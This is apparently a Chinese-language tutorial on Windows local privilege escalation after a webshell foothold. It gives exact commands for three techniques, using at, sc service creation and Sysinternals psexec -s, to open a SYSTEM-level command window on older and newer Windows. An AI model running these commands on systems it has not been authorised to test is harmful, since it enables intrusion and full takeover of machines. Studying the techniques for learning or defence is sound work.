权限提升：本地权限提升.（AT || SC || PS ）

权限提升：本地权限提升.

权限提升简称提权，由于操作系统都是多用户操作系统，用户之间都有权限控制，比如通过 Web 漏洞拿到的是 Web 进程的权限，往往 Web 服务都是以一个权限很低的账号启动的，因此通过 Webshell 进行一些操作会受到限制，这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权，也可以通过第三方软件服务，如数据库或 FTP 等软件的漏洞进行提权。

免责声明：

严禁利用本文章中所提到的技术进行非法攻击，否则后果自负，上传者不承担任何责任。

AT 提权：

第一步：打开一个命令行添加一项作业.

at 15:13 /interactive cmd.exe        //这个时间打开一个命令行.

第二步：时间一到就会自动个高权限的窗口出来.（AT 提权只能针对 Win 7 以前的系统）

SC 提权：

第一步：打开一个命令行创建一个新的服务，名字为 syscmd

sc Create syscmd binPath= "cmd /K start" type= own type= interact

第二步：执行这个新的服务，会自动个高权限的窗口出来.（SC 提权只能针对 Win 7 以前的系统）

sc start syscmd

PS 提权：

第一步：下载一个 Windows 官方的工具.

PsTools - Sysinternals | Microsoft Learn

第二步：解压放到要提权的服务器中，打开命令行切换到这个文件的目录中.（会打开一个新的窗口.）PS 提权针对 Win 7 以后的系统也有影响.

psexec.exe -accepteula -s -i -d cmd.exe

学习链接：第59天：权限提升-Win溢出漏洞及AT&SC&PS提权_哔哩哔哩_bilibili